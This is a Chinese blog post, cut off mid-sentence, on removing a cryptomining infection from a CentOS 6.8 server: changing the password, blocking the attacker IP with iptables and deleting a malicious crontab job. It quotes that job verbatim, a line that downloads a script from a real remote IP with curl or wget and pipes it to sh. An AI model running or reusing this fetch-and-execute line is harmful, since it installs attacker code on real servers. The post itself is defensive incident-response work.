centos6.8服务器中了挖矿程序病毒的解决方法

阿里云提示我的centos服务器出现紧急安全事件:挖矿程序;同时也出现服务器异常登录事件。

出现这样的情况,需要根据以下的步骤去处理

第一步:修改登录的帐号密码,输入命令passwd,根据提未修改。

第二步:禁用可疑的IP,阿里云会有一些IP提示,先把异常登录的IP禁用;命令如下

iptables -I INPUT -s 68.183.140.39 -j DROP  //禁用指定的IP

iptables -L -n -v //查看防火墙当前的状态

第三步:删除挖矿病毒程序,大部分的程序无法是常驻内部并且增加一个守护进程,或者直接在crontab中加入定时任务;

我们先解决最简单的,把crontab中的可疑定时任务删除。

输入crontab -e查看,发现以下的定时任务

*/15 * * * * (/usr/bin/uzmnfa4||/usr/libexec/uzmnfa4||/usr/local/bin/uzmnfa4||/tmp/uzmnfa4||curl -m180 -fsSL http://68.183.140.39:8000/i.sh||wget -q -T180 -O- http://68.183.140.39:8000/i.sh) | sh

根据此命令去查找相应的病毒文件,使用r

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值